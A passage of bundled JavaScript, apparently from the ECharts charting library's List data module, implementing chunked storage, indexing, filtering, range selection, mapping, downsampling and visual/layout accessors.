chunkSize, chunkSize));\n        // The cost of the copy is probably inconsiderable\n        // within the initial chunkSize.\n        for (var j = 0; j < resizeChunkArray.length; j++) {\n            newStore[j] = resizeChunkArray[j];\n        }\n        storage[dim][lastChunkIndex] = newStore;\n    }\n\n    // Create new chunks.\n    for (var k = chunkCount * chunkSize; k < end; k += chunkSize) {\n        storage[dim].push(new DataCtor(Math.min(end - k, chunkSize)));\n    }\n}\n\nfunction prepareInvertedIndex(list) {\n    var invertedIndicesMap = list._invertedIndicesMap;\n    each$1(invertedIndicesMap, function (invertedIndices, dim) {\n        var dimInfo = list._dimensionInfos[dim];\n\n        // Currently, only dimensions that has ordinalMeta can create inverted indices.\n        var ordinalMeta = dimInfo.ordinalMeta;\n        if (ordinalMeta) {\n            invertedIndices = invertedIndicesMap[dim] = new CtorInt32Array(\n                ordinalMeta.categories.length\n            );\n            // The default value of TypedArray is 0. To avoid miss\n            // mapping to 0, we should set it as INDEX_NOT_FOUND.\n            for (var i = 0; i < invertedIndices.length; i++) {\n                invertedIndices[i] = INDEX_NOT_FOUND;\n            }\n            for (var i = 0; i < list._count; i++) {\n                // Only support the case that all values are distinct.\n                invertedIndices[list.get(dim, i)] = i;\n            }\n        }\n    });\n}\n\nfunction getRawValueFromStore(list, dimIndex, rawIndex) {\n    var val;\n    if (dimIndex != null) {\n        var chunkSize = list._chunkSize;\n        var chunkIndex = Math.floor(rawIndex / chunkSize);\n        var chunkOffset = rawIndex % chunkSize;\n        var dim = list.dimensions[dimIndex];\n        var chunk = list._storage[dim][chunkIndex];\n        if (chunk) {\n            val = chunk[chunkOffset];\n            var ordinalMeta = list._dimensionInfos[dim].ordinalMeta;\n            if (ordinalMeta && ordinalMeta.categories.length) {\n                val = ordinalMeta.categories[val];\n            }\n        }\n    }\n    return val;\n}\n\n/**\n * @return {number}\n */\nlistProto.count = function () {\n    return this._count;\n};\n\nlistProto.getIndices = function () {\n    var newIndices;\n\n    var indices = this._indices;\n    if (indices) {\n        var Ctor = indices.constructor;\n        var thisCount = this._count;\n        // `new Array(a, b, c)` is different from `new Uint32Array(a, b, c)`.\n        if (Ctor === Array) {\n            newIndices = new Ctor(thisCount);\n            for (var i = 0; i < thisCount; i++) {\n                newIndices[i] = indices[i];\n            }\n        }\n        else {\n            newIndices = new Ctor(indices.buffer, 0, thisCount);\n        }\n    }\n    else {\n        var Ctor = getIndicesCtor(this);\n        var newIndices = new Ctor(this.count());\n        for (var i = 0; i < newIndices.length; i++) {\n            newIndices[i] = i;\n        }\n    }\n\n    return newIndices;\n};\n\n/**\n * Get value. Return NaN if idx is out of range.\n * @param {string} dim Dim must be concrete name.\n * @param {number} idx\n * @param {boolean} stack\n * @return {number}\n */\nlistProto.get = function (dim, idx /*, stack */) {\n    if (!(idx >= 0 && idx < this._count)) {\n        return NaN;\n    }\n    var storage = this._storage;\n    if (!storage[dim]) {\n        // TODO Warn ?\n        return NaN;\n    }\n\n    idx = this.getRawIndex(idx);\n\n    var chunkIndex = Math.floor(idx / this._chunkSize);\n    var chunkOffset = idx % this._chunkSize;\n\n    var chunkStore = storage[dim][chunkIndex];\n    var value = chunkStore[chunkOffset];\n    // FIXME ordinal data type is not stackable\n    // if (stack) {\n    //     var dimensionInfo = this._dimensionInfos[dim];\n    //     if (dimensionInfo && dimensionInfo.stackable) {\n    //         var stackedOn = this.stackedOn;\n    //         while (stackedOn) {\n    //             // Get no stacked data of stacked on\n    //             var stackedValue = stackedOn.get(dim, idx);\n    //             // Considering positive stack, negative stack and empty data\n    //             if ((value >= 0 && stackedValue > 0)  // Positive stack\n    //                 || (value <= 0 && stackedValue < 0) // Negative stack\n    //             ) {\n    //                 value += stackedValue;\n    //             }\n    //             stackedOn = stackedOn.stackedOn;\n    //         }\n    //     }\n    // }\n\n    return value;\n};\n\n/**\n * @param {string} dim concrete dim\n * @param {number} rawIndex\n * @return {number|string}\n */\nlistProto.getByRawIndex = function (dim, rawIdx) {\n    if (!(rawIdx >= 0 && rawIdx < this._rawCount)) {\n        return NaN;\n    }\n    var dimStore = this._storage[dim];\n    if (!dimStore) {\n        // TODO Warn ?\n        return NaN;\n    }\n\n    var chunkIndex = Math.floor(rawIdx / this._chunkSize);\n    var chunkOffset = rawIdx % this._chunkSize;\n    var chunkStore = dimStore[chunkIndex];\n    return chunkStore[chunkOffset];\n};\n\n/**\n * FIXME Use `get` on chrome maybe slow(in filterSelf and selectRange).\n * Hack a much simpler _getFast\n * @private\n */\nlistProto._getFast = function (dim, rawIdx) {\n    var chunkIndex = Math.floor(rawIdx / this._chunkSize);\n    var chunkOffset = rawIdx % this._chunkSize;\n    var chunkStore = this._storage[dim][chunkIndex];\n    return chunkStore[chunkOffset];\n};\n\n/**\n * Get value for multi dimensions.\n * @param {Array.<string>} [dimensions] If ignored, using all dimensions.\n * @param {number} idx\n * @return {number}\n */\nlistProto.getValues = function (dimensions, idx /*, stack */) {\n    var values = [];\n\n    if (!isArray(dimensions)) {\n        // stack = idx;\n        idx = dimensions;\n        dimensions = this.dimensions;\n    }\n\n    for (var i = 0, len = dimensions.length; i < len; i++) {\n        values.push(this.get(dimensions[i], idx /*, stack */));\n    }\n\n    return values;\n};\n\n/**\n * If value is NaN. Inlcuding '-'\n * Only check the coord dimensions.\n * @param {string} dim\n * @param {number} idx\n * @return {number}\n */\nlistProto.hasValue = function (idx) {\n    var dataDimsOnCoord = this._dimensionsSummary.dataDimsOnCoord;\n    for (var i = 0, len = dataDimsOnCoord.length; i < len; i++) {\n        // Ordinal type originally can be string or number.\n        // But when an ordinal type is used on coord, it can\n        // not be string but only number. So we can also use isNaN.\n        if (isNaN(this.get(dataDimsOnCoord[i], idx))) {\n            return false;\n        }\n    }\n    return true;\n};\n\n/**\n * Get extent of data in one dimension\n * @param {string} dim\n * @param {boolean} stack\n */\nlistProto.getDataExtent = function (dim /*, stack */) {\n    // Make sure use concrete dim as cache name.\n    dim = this.getDimension(dim);\n    var dimData = this._storage[dim];\n    var initialExtent = getInitialExtent();\n\n    // stack = !!((stack || false) && this.getCalculationInfo(dim));\n\n    if (!dimData) {\n        return initialExtent;\n    }\n\n    // Make more strict checkings to ensure hitting cache.\n    var currEnd = this.count();\n    // var cacheName = [dim, !!stack].join('_');\n    // var cacheName = dim;\n\n    // Consider the most cases when using data zoom, `getDataExtent`\n    // happened before filtering. We cache raw extent, which is not\n    // necessary to be cleared and recalculated when restore data.\n    var useRaw = !this._indices; // && !stack;\n    var dimExtent;\n\n    if (useRaw) {\n        return this._rawExtent[dim].slice();\n    }\n    dimExtent = this._extent[dim];\n    if (dimExtent) {\n        return dimExtent.slice();\n    }\n    dimExtent = initialExtent;\n\n    var min = dimExtent[0];\n    var max = dimExtent[1];\n\n    for (var i = 0; i < currEnd; i++) {\n        // var value = stack ? this.get(dim, i, true) : this._getFast(dim, this.getRawIndex(i));\n        var value = this._getFast(dim, this.getRawIndex(i));\n        value < min && (min = value);\n        value > max && (max = value);\n    }\n\n    dimExtent = [min, max];\n\n    this._extent[dim] = dimExtent;\n\n    return dimExtent;\n};\n\n/**\n * Optimize for the scenario that data is filtered by a given extent.\n * Consider that if data amount is more than hundreds of thousand,\n * extent calculation will cost more than 10ms and the cache will\n * be erased because of the filtering.\n */\nlistProto.getApproximateExtent = function (dim /*, stack */) {\n    dim = this.getDimension(dim);\n    return this._approximateExtent[dim] || this.getDataExtent(dim /*, stack */);\n};\n\nlistProto.setApproximateExtent = function (extent, dim /*, stack */) {\n    dim = this.getDimension(dim);\n    this._approximateExtent[dim] = extent.slice();\n};\n\n/**\n * @param {string} key\n * @return {*}\n */\nlistProto.getCalculationInfo = function (key) {\n    return this._calculationInfo[key];\n};\n\n/**\n * @param {string|Object} key or k-v object\n * @param {*} [value]\n */\nlistProto.setCalculationInfo = function (key, value) {\n    isObject$4(key)\n        ? extend(this._calculationInfo, key)\n        : (this._calculationInfo[key] = value);\n};\n\n/**\n * Get sum of data in one dimension\n * @param {string} dim\n */\nlistProto.getSum = function (dim /*, stack */) {\n    var dimData = this._storage[dim];\n    var sum = 0;\n    if (dimData) {\n        for (var i = 0, len = this.count(); i < len; i++) {\n            var value = this.get(dim, i /*, stack */);\n            if (!isNaN(value)) {\n                sum += value;\n            }\n        }\n    }\n    return sum;\n};\n\n/**\n * Get median of data in one dimension\n * @param {string} dim\n */\nlistProto.getMedian = function (dim /*, stack */) {\n    var dimDataArray = [];\n    // map all data of one dimension\n    this.each(dim, function (val, idx) {\n        if (!isNaN(val)) {\n            dimDataArray.push(val);\n        }\n    });\n\n    // TODO\n    // Use quick select?\n\n    // immutability & sort\n    var sortedDimDataArray = [].concat(dimDataArray).sort(function (a, b) {\n        return a - b;\n    });\n    var len = this.count();\n    // calculate median\n    return len === 0\n        ? 0\n        : len % 2 === 1\n        ? sortedDimDataArray[(len - 1) / 2]\n        : (sortedDimDataArray[len / 2] + sortedDimDataArray[len / 2 - 1]) / 2;\n};\n\n// /**\n//  * Retreive the index with given value\n//  * @param {string} dim Concrete dimension.\n//  * @param {number} value\n//  * @return {number}\n//  */\n// Currently incorrect: should return dataIndex but not rawIndex.\n// Do not fix it until this method is to be used somewhere.\n// FIXME Precision of float value\n// listProto.indexOf = function (dim, value) {\n//     var storage = this._storage;\n//     var dimData = storage[dim];\n//     var chunkSize = this._chunkSize;\n//     if (dimData) {\n//         for (var i = 0, len = this.count(); i < len; i++) {\n//             var chunkIndex = Math.floor(i / chunkSize);\n//             var chunkOffset = i % chunkSize;\n//             if (dimData[chunkIndex][chunkOffset] === value) {\n//                 return i;\n//             }\n//         }\n//     }\n//     return -1;\n// };\n\n/**\n * Only support the dimension which inverted index created.\n * Do not support other cases until required.\n * @param {string} concrete dim\n * @param {number|string} value\n * @return {number} rawIndex\n */\nlistProto.rawIndexOf = function (dim, value) {\n    var invertedIndices = dim && this._invertedIndicesMap[dim];\n    if (__DEV__) {\n        if (!invertedIndices) {\n            throw new Error('Do not supported yet');\n        }\n    }\n    var rawIndex = invertedIndices[value];\n    if (rawIndex == null || isNaN(rawIndex)) {\n        return INDEX_NOT_FOUND;\n    }\n    return rawIndex;\n};\n\n/**\n * Retreive the index with given name\n * @param {number} idx\n * @param {number} name\n * @return {number}\n */\nlistProto.indexOfName = function (name) {\n    for (var i = 0, len = this.count(); i < len; i++) {\n        if (this.getName(i) === name) {\n            return i;\n        }\n    }\n\n    return -1;\n};\n\n/**\n * Retreive the index with given raw data index\n * @param {number} idx\n * @param {number} name\n * @return {number}\n */\nlistProto.indexOfRawIndex = function (rawIndex) {\n    if (rawIndex >= this._rawCount || rawIndex < 0) {\n        return -1;\n    }\n\n    if (!this._indices) {\n        return rawIndex;\n    }\n\n    // Indices are ascending\n    var indices = this._indices;\n\n    // If rawIndex === dataIndex\n    var rawDataIndex = indices[rawIndex];\n    if (rawDataIndex != null && rawDataIndex < this._count && rawDataIndex === rawIndex) {\n        return rawIndex;\n    }\n\n    var left = 0;\n    var right = this._count - 1;\n    while (left <= right) {\n        var mid = (left + right) / 2 | 0;\n        if (indices[mid] < rawIndex) {\n            left = mid + 1;\n        }\n        else if (indices[mid] > rawIndex) {\n            right = mid - 1;\n        }\n        else {\n            return mid;\n        }\n    }\n    return -1;\n};\n\n/**\n * Retreive the index of nearest value\n * @param {string} dim\n * @param {number} value\n * @param {number} [maxDistance=Infinity]\n * @return {Array.<number>} If and only if multiple indices has\n *        the same value, they are put to the result.\n */\nlistProto.indicesOfNearest = function (dim, value, maxDistance) {\n    var storage = this._storage;\n    var dimData = storage[dim];\n    var nearestIndices = [];\n\n    if (!dimData) {\n        return nearestIndices;\n    }\n\n    if (maxDistance == null) {\n        maxDistance = Infinity;\n    }\n\n    var minDist = Infinity;\n    var minDiff = -1;\n    var nearestIndicesLen = 0;\n\n    // Check the test case of `test/ut/spec/data/List.js`.\n    for (var i = 0, len = this.count(); i < len; i++) {\n        var diff = value - this.get(dim, i);\n        var dist = Math.abs(diff);\n        if (dist <= maxDistance) {\n            // When the `value` is at the middle of `this.get(dim, i)` and `this.get(dim, i+1)`,\n            // we'd better not push both of them to `nearestIndices`, otherwise it is easy to\n            // get more than one item in `nearestIndices` (more specifically, in `tooltip`).\n            // So we chose the one that `diff >= 0` in this csae.\n            // But if `this.get(dim, i)` and `this.get(dim, j)` get the same value, both of them\n            // should be push to `nearestIndices`.\n            if (dist < minDist\n                || (dist === minDist && diff >= 0 && minDiff < 0)\n            ) {\n                minDist = dist;\n                minDiff = diff;\n                nearestIndicesLen = 0;\n            }\n            if (diff === minDiff) {\n                nearestIndices[nearestIndicesLen++] = i;\n            }\n        }\n    }\n    nearestIndices.length = nearestIndicesLen;\n\n    return nearestIndices;\n};\n\n/**\n * Get raw data index\n * @param {number} idx\n * @return {number}\n */\nlistProto.getRawIndex = getRawIndexWithoutIndices;\n\nfunction getRawIndexWithoutIndices(idx) {\n    return idx;\n}\n\nfunction getRawIndexWithIndices(idx) {\n    if (idx < this._count && idx >= 0) {\n        return this._indices[idx];\n    }\n    return -1;\n}\n\n/**\n * Get raw data item\n * @param {number} idx\n * @return {number}\n */\nlistProto.getRawDataItem = function (idx) {\n    if (!this._rawData.persistent) {\n        var val = [];\n        for (var i = 0; i < this.dimensions.length; i++) {\n            var dim = this.dimensions[i];\n            val.push(this.get(dim, idx));\n        }\n        return val;\n    }\n    else {\n        return this._rawData.getItem(this.getRawIndex(idx));\n    }\n};\n\n/**\n * @param {number} idx\n * @param {boolean} [notDefaultIdx=false]\n * @return {string}\n */\nlistProto.getName = function (idx) {\n    var rawIndex = this.getRawIndex(idx);\n    return this._nameList[rawIndex]\n        || getRawValueFromStore(this, this._nameDimIdx, rawIndex)\n        || '';\n};\n\n/**\n * @param {number} idx\n * @param {boolean} [notDefaultIdx=false]\n * @return {string}\n */\nlistProto.getId = function (idx) {\n    return getId(this, this.getRawIndex(idx));\n};\n\nfunction getId(list, rawIndex) {\n    var id = list._idList[rawIndex];\n    if (id == null) {\n        id = getRawValueFromStore(list, list._idDimIdx, rawIndex);\n    }\n    if (id == null) {\n        // FIXME Check the usage in graph, should not use prefix.\n        id = ID_PREFIX + rawIndex;\n    }\n    return id;\n}\n\nfunction normalizeDimensions(dimensions) {\n    if (!isArray(dimensions)) {\n        dimensions = [dimensions];\n    }\n    return dimensions;\n}\n\nfunction validateDimensions(list, dims) {\n    for (var i = 0; i < dims.length; i++) {\n        // stroage may be empty when no data, so use\n        // dimensionInfos to check.\n        if (!list._dimensionInfos[dims[i]]) {\n            console.error('Unkown dimension ' + dims[i]);\n        }\n    }\n}\n\n/**\n * Data iteration\n * @param {string|Array.<string>}\n * @param {Function} cb\n * @param {*} [context=this]\n *\n * @example\n *  list.each('x', function (x, idx) {});\n *  list.each(['x', 'y'], function (x, y, idx) {});\n *  list.each(function (idx) {})\n */\nlistProto.each = function (dims, cb, context, contextCompat) {\n    'use strict';\n\n    if (!this._count) {\n        return;\n    }\n\n    if (typeof dims === 'function') {\n        contextCompat = context;\n        context = cb;\n        cb = dims;\n        dims = [];\n    }\n\n    // contextCompat just for compat echarts3\n    context = context || contextCompat || this;\n\n    dims = map(normalizeDimensions(dims), this.getDimension, this);\n\n    if (__DEV__) {\n        validateDimensions(this, dims);\n    }\n\n    var dimSize = dims.length;\n\n    for (var i = 0; i < this.count(); i++) {\n        // Simple optimization\n        switch (dimSize) {\n            case 0:\n                cb.call(context, i);\n                break;\n            case 1:\n                cb.call(context, this.get(dims[0], i), i);\n                break;\n            case 2:\n                cb.call(context, this.get(dims[0], i), this.get(dims[1], i), i);\n                break;\n            default:\n                var k = 0;\n                var value = [];\n                for (; k < dimSize; k++) {\n                    value[k] = this.get(dims[k], i);\n                }\n                // Index\n                value[k] = i;\n                cb.apply(context, value);\n        }\n    }\n};\n\n/**\n * Data filter\n * @param {string|Array.<string>}\n * @param {Function} cb\n * @param {*} [context=this]\n */\nlistProto.filterSelf = function (dimensions, cb, context, contextCompat) {\n    'use strict';\n\n    if (!this._count) {\n        return;\n    }\n\n    if (typeof dimensions === 'function') {\n        contextCompat = context;\n        context = cb;\n        cb = dimensions;\n        dimensions = [];\n    }\n\n    // contextCompat just for compat echarts3\n    context = context || contextCompat || this;\n\n    dimensions = map(\n        normalizeDimensions(dimensions), this.getDimension, this\n    );\n\n    if (__DEV__) {\n        validateDimensions(this, dimensions);\n    }\n\n\n    var count = this.count();\n    var Ctor = getIndicesCtor(this);\n    var newIndices = new Ctor(count);\n    var value = [];\n    var dimSize = dimensions.length;\n\n    var offset = 0;\n    var dim0 = dimensions[0];\n\n    for (var i = 0; i < count; i++) {\n        var keep;\n        var rawIdx = this.getRawIndex(i);\n        // Simple optimization\n        if (dimSize === 0) {\n            keep = cb.call(context, i);\n        }\n        else if (dimSize === 1) {\n            var val = this._getFast(dim0, rawIdx);\n            keep = cb.call(context, val, i);\n        }\n        else {\n            for (var k = 0; k < dimSize; k++) {\n                value[k] = this._getFast(dim0, rawIdx);\n            }\n            value[k] = i;\n            keep = cb.apply(context, value);\n        }\n        if (keep) {\n            newIndices[offset++] = rawIdx;\n        }\n    }\n\n    // Set indices after filtered.\n    if (offset < count) {\n        this._indices = newIndices;\n    }\n    this._count = offset;\n    // Reset data extent\n    this._extent = {};\n\n    this.getRawIndex = this._indices ? getRawIndexWithIndices : getRawIndexWithoutIndices;\n\n    return this;\n};\n\n/**\n * Select data in range. (For optimization of filter)\n * (Manually inline code, support 5 million data filtering in data zoom.)\n */\nlistProto.selectRange = function (range) {\n    'use strict';\n\n    if (!this._count) {\n        return;\n    }\n\n    var dimensions = [];\n    for (var dim in range) {\n        if (range.hasOwnProperty(dim)) {\n            dimensions.push(dim);\n        }\n    }\n\n    if (__DEV__) {\n        validateDimensions(this, dimensions);\n    }\n\n    var dimSize = dimensions.length;\n    if (!dimSize) {\n        return;\n    }\n\n    var originalCount = this.count();\n    var Ctor = getIndicesCtor(this);\n    var newIndices = new Ctor(originalCount);\n\n    var offset = 0;\n    var dim0 = dimensions[0];\n\n    var min = range[dim0][0];\n    var max = range[dim0][1];\n\n    var quickFinished = false;\n    if (!this._indices) {\n        // Extreme optimization for common case. About 2x faster in chrome.\n        var idx = 0;\n        if (dimSize === 1) {\n            var dimStorage = this._storage[dimensions[0]];\n            for (var k = 0; k < this._chunkCount; k++) {\n                var chunkStorage = dimStorage[k];\n                var len = Math.min(this._count - k * this._chunkSize, this._chunkSize);\n                for (var i = 0; i < len; i++) {\n                    var val = chunkStorage[i];\n                    // NaN will not be filtered. Consider the case, in line chart, empty\n                    // value indicates the line should be broken. But for the case like\n                    // scatter plot, a data item with empty value will not be rendered,\n                    // but the axis extent may be effected if some other dim of the data\n                    // item has value. Fortunately it is not a significant negative effect.\n                    if (\n                        (val >= min && val <= max) || isNaN(val)\n                    ) {\n                        newIndices[offset++] = idx;\n                    }\n                    idx++;\n                }\n            }\n            quickFinished = true;\n        }\n        else if (dimSize === 2) {\n            var dimStorage = this._storage[dim0];\n            var dimStorage2 = this._storage[dimensions[1]];\n            var min2 = range[dimensions[1]][0];\n            var max2 = range[dimensions[1]][1];\n            for (var k = 0; k < this._chunkCount; k++) {\n                var chunkStorage = dimStorage[k];\n                var chunkStorage2 = dimStorage2[k];\n                var len = Math.min(this._count - k * this._chunkSize, this._chunkSize);\n                for (var i = 0; i < len; i++) {\n                    var val = chunkStorage[i];\n                    var val2 = chunkStorage2[i];\n                    // Do not filter NaN, see comment above.\n                    if ((\n                            (val >= min && val <= max) || isNaN(val)\n                        )\n                        && (\n                            (val2 >= min2 && val2 <= max2) || isNaN(val2)\n                        )\n                    ) {\n                        newIndices[offset++] = idx;\n                    }\n                    idx++;\n                }\n            }\n            quickFinished = true;\n        }\n    }\n    if (!quickFinished) {\n        if (dimSize === 1) {\n            for (var i = 0; i < originalCount; i++) {\n                var rawIndex = this.getRawIndex(i);\n                var val = this._getFast(dim0, rawIndex);\n                // Do not filter NaN, see comment above.\n                if (\n                    (val >= min && val <= max) || isNaN(val)\n                ) {\n                    newIndices[offset++] = rawIndex;\n                }\n            }\n        }\n        else {\n            for (var i = 0; i < originalCount; i++) {\n                var keep = true;\n                var rawIndex = this.getRawIndex(i);\n                for (var k = 0; k < dimSize; k++) {\n                    var dimk = dimensions[k];\n                    var val = this._getFast(dim, rawIndex);\n                    // Do not filter NaN, see comment above.\n                    if (val < range[dimk][0] || val > range[dimk][1]) {\n                        keep = false;\n                    }\n                }\n                if (keep) {\n                    newIndices[offset++] = this.getRawIndex(i);\n                }\n            }\n        }\n    }\n\n    // Set indices after filtered.\n    if (offset < originalCount) {\n        this._indices = newIndices;\n    }\n    this._count = offset;\n    // Reset data extent\n    this._extent = {};\n\n    this.getRawIndex = this._indices ? getRawIndexWithIndices : getRawIndexWithoutIndices;\n\n    return this;\n};\n\n/**\n * Data mapping to a plain array\n * @param {string|Array.<string>} [dimensions]\n * @param {Function} cb\n * @param {*} [context=this]\n * @return {Array}\n */\nlistProto.mapArray = function (dimensions, cb, context, contextCompat) {\n    'use strict';\n\n    if (typeof dimensions === 'function') {\n        contextCompat = context;\n        context = cb;\n        cb = dimensions;\n        dimensions = [];\n    }\n\n    // contextCompat just for compat echarts3\n    context = context || contextCompat || this;\n\n    var result = [];\n    this.each(dimensions, function () {\n        result.push(cb && cb.apply(this, arguments));\n    }, context);\n    return result;\n};\n\n// Data in excludeDimensions is copied, otherwise transfered.\nfunction cloneListForMapAndSample(original, excludeDimensions) {\n    var allDimensions = original.dimensions;\n    var list = new List(\n        map(allDimensions, original.getDimensionInfo, original),\n        original.hostModel\n    );\n    // FIXME If needs stackedOn, value may already been stacked\n    transferProperties(list, original);\n\n    var storage = list._storage = {};\n    var originalStorage = original._storage;\n\n    // Init storage\n    for (var i = 0; i < allDimensions.length; i++) {\n        var dim = allDimensions[i];\n        if (originalStorage[dim]) {\n            // Notice that we do not reset invertedIndicesMap here, becuase\n            // there is no scenario of mapping or sampling ordinal dimension.\n            if (indexOf(excludeDimensions, dim) >= 0) {\n                storage[dim] = cloneDimStore(originalStorage[dim]);\n                list._rawExtent[dim] = getInitialExtent();\n                list._extent[dim] = null;\n            }\n            else {\n                // Direct reference for other dimensions\n                storage[dim] = originalStorage[dim];\n            }\n        }\n    }\n    return list;\n}\n\nfunction cloneDimStore(originalDimStore) {\n    var newDimStore = new Array(originalDimStore.length);\n    for (var j = 0; j < originalDimStore.length; j++) {\n        newDimStore[j] = cloneChunk(originalDimStore[j]);\n    }\n    return newDimStore;\n}\n\nfunction getInitialExtent() {\n    return [Infinity, -Infinity];\n}\n\n/**\n * Data mapping to a new List with given dimensions\n * @param {string|Array.<string>} dimensions\n * @param {Function} cb\n * @param {*} [context=this]\n * @return {Array}\n */\nlistProto.map = function (dimensions, cb, context, contextCompat) {\n    'use strict';\n\n    // contextCompat just for compat echarts3\n    context = context || contextCompat || this;\n\n    dimensions = map(\n        normalizeDimensions(dimensions), this.getDimension, this\n    );\n\n    if (__DEV__) {\n        validateDimensions(this, dimensions);\n    }\n\n    var list = cloneListForMapAndSample(this, dimensions);\n\n    // Following properties are all immutable.\n    // So we can reference to the same value\n    list._indices = this._indices;\n    list.getRawIndex = list._indices ? getRawIndexWithIndices : getRawIndexWithoutIndices;\n\n    var storage = list._storage;\n\n    var tmpRetValue = [];\n    var chunkSize = this._chunkSize;\n    var dimSize = dimensions.length;\n    var dataCount = this.count();\n    var values = [];\n    var rawExtent = list._rawExtent;\n\n    for (var dataIndex = 0; dataIndex < dataCount; dataIndex++) {\n        for (var dimIndex = 0; dimIndex < dimSize; dimIndex++) {\n            values[dimIndex] = this.get(dimensions[dimIndex], dataIndex /*, stack */);\n        }\n        values[dimSize] = dataIndex;\n\n        var retValue = cb && cb.apply(context, values);\n        if (retValue != null) {\n            // a number or string (in oridinal dimension)?\n            if (typeof retValue !== 'object') {\n                tmpRetValue[0] = retValue;\n                retValue = tmpRetValue;\n            }\n\n            var rawIndex = this.getRawIndex(dataIndex);\n            var chunkIndex = Math.floor(rawIndex / chunkSize);\n            var chunkOffset = rawIndex % chunkSize;\n\n            for (var i = 0; i < retValue.length; i++) {\n                var dim = dimensions[i];\n                var val = retValue[i];\n                var rawExtentOnDim = rawExtent[dim];\n\n                var dimStore = storage[dim];\n                if (dimStore) {\n                    dimStore[chunkIndex][chunkOffset] = val;\n                }\n\n                if (val < rawExtentOnDim[0]) {\n                    rawExtentOnDim[0] = val;\n                }\n                if (val > rawExtentOnDim[1]) {\n                    rawExtentOnDim[1] = val;\n                }\n            }\n        }\n    }\n\n    return list;\n};\n\n/**\n * Large data down sampling on given dimension\n * @param {string} dimension\n * @param {number} rate\n * @param {Function} sampleValue\n * @param {Function} sampleIndex Sample index for name and id\n */\nlistProto.downSample = function (dimension, rate, sampleValue, sampleIndex) {\n    var list = cloneListForMapAndSample(this, [dimension]);\n    var targetStorage = list._storage;\n\n    var frameValues = [];\n    var frameSize = Math.floor(1 / rate);\n\n    var dimStore = targetStorage[dimension];\n    var len = this.count();\n    var chunkSize = this._chunkSize;\n    var rawExtentOnDim = list._rawExtent[dimension];\n\n    var newIndices = new (getIndicesCtor(this))(len);\n\n    var offset = 0;\n    for (var i = 0; i < len; i += frameSize) {\n        // Last frame\n        if (frameSize > len - i) {\n            frameSize = len - i;\n            frameValues.length = frameSize;\n        }\n        for (var k = 0; k < frameSize; k++) {\n            var dataIdx = this.getRawIndex(i + k);\n            var originalChunkIndex = Math.floor(dataIdx / chunkSize);\n            var originalChunkOffset = dataIdx % chunkSize;\n            frameValues[k] = dimStore[originalChunkIndex][originalChunkOffset];\n        }\n        var value = sampleValue(frameValues);\n        var sampleFrameIdx = this.getRawIndex(\n            Math.min(i + sampleIndex(frameValues, value) || 0, len - 1)\n        );\n        var sampleChunkIndex = Math.floor(sampleFrameIdx / chunkSize);\n        var sampleChunkOffset = sampleFrameIdx % chunkSize;\n        // Only write value on the filtered data\n        dimStore[sampleChunkIndex][sampleChunkOffset] = value;\n\n        if (value < rawExtentOnDim[0]) {\n            rawExtentOnDim[0] = value;\n        }\n        if (value > rawExtentOnDim[1]) {\n            rawExtentOnDim[1] = value;\n        }\n\n        newIndices[offset++] = sampleFrameIdx;\n    }\n\n    list._count = offset;\n    list._indices = newIndices;\n\n    list.getRawIndex = getRawIndexWithIndices;\n\n    return list;\n};\n\n/**\n * Get model of one data item.\n *\n * @param {number} idx\n */\n// FIXME Model proxy ?\nlistProto.getItemModel = function (idx) {\n    var hostModel = this.hostModel;\n    return new Model(this.getRawDataItem(idx), hostModel, hostModel && hostModel.ecModel);\n};\n\n/**\n * Create a data differ\n * @param {module:echarts/data/List} otherList\n * @return {module:echarts/data/DataDiffer}\n */\nlistProto.diff = function (otherList) {\n    var thisList = this;\n\n    return new DataDiffer(\n        otherList ? otherList.getIndices() : [],\n        this.getIndices(),\n        function (idx) {\n            return getId(otherList, idx);\n        },\n        function (idx) {\n            return getId(thisList, idx);\n        }\n    );\n};\n/**\n * Get visual property.\n * @param {string} key\n */\nlistProto.getVisual = function (key) {\n    var visual = this._visual;\n    return visual && visual[key];\n};\n\n/**\n * Set visual property\n * @param {string|Object} key\n * @param {*} [value]\n *\n * @example\n *  setVisual('color', color);\n *  setVisual({\n *      'color': color\n *  });\n */\nlistProto.setVisual = function (key, val) {\n    if (isObject$4(key)) {\n        for (var name in key) {\n            if (key.hasOwnProperty(name)) {\n                this.setVisual(name, key[name]);\n            }\n        }\n        return;\n    }\n    this._visual = this._visual || {};\n    this._visual[key] = val;\n};\n\n/**\n * Set layout property.\n * @param {string|Object} key\n * @param {*} [val]\n */\nlistProto.setLayout = function (key, val) {\n    if (isObject$4(key)) {\n        for (var name in key) {\n            if (key.hasOwnProperty(name)) {\n                this.setLayout(name, key[name]);\n            }\n        }\n        return;\n    }\n    this._layout[key] = val;\n};\n\n/**\n * Get layout property.\n * @param  {string} key.\n * @return {*}\n */\nlistProto.getLayout = function (key) {\n    return this._layout[key];\n};\n\n/**\n * Get layout of single data item\n * @param {number} idx\n */\nlistProto.getItemLayout = function (idx) {\n    return this._itemLayouts[idx];\n};\n\n/**\n * Set layout of single data item\n * @param {number} idx\n * @param {Object} layout\n * @param {boolean=} [merge=false]\n */\nlistProto.setItemLayout = function (idx, layout, merge$$1) {\n    this._itemLayouts[idx] = merge$$1\n        ? extend(this._itemLayouts[idx] || {}, layout)\n        : layout;\n};\n\n/**\n * Clear all layout of single data item\n */\nlistProto.clearItemLayouts = function () {\n    this._itemLayouts.length = 0;\n};\n\n/**\n * Get visual property of single data item\n * @param {number} idx\n * @param {string} key\n * @param {boolean} [ignoreParent=false]\n */\nlistProto.getItemVisual = function (idx, key, ignoreParent) {\n    var itemVisual = this._itemVisuals[idx];\n    var val = itemVisual && itemVisual[key];\n    if (val == null && !ignoreParent) {\n        // Use global visual property\n        return this.getVisual(key);\n    }\n    return val;\n};\n\n/**\n * Set visual property of single data item\n *\n * @param {number} idx\n * @param {string|Object} key\n * @param {*} [value]\n *\n * @example\n *  setItemVisual(0, 'color', color);\n *  setItemVisual(0, {\n *      'color': color\n *  });\n */\nlistProto.setItemVisual = function (idx, key, value) {\n    var itemVisual = this._itemVisuals[idx] || {};\n    var hasItemVisual = this.hasItemVisual;\n    this._itemVisuals[idx] = itemVisual;\n\n    if (isObject$4(key)) {\n        for (var name in key) {\n            if (key.hasOwnProperty(name)) {\n                itemVisual[name] = key[name];\n                hasItemVisual[name] = true;\n            }\n        }\n        return;\n    }\n    itemVisual[key] = value;\n    hasItemVisual[key] = true;\n};\n\n/**\n * Clear itemVisuals and list visual.\n */\nlistProto.clearAllVisual = function () {\n    this._visual = {};\n    this._itemVisuals = [];\n    this.hasItemVisual = {};\n};\n\nvar setItemDataAndSeriesIndex = function (child) {\n    child.seriesIndex = 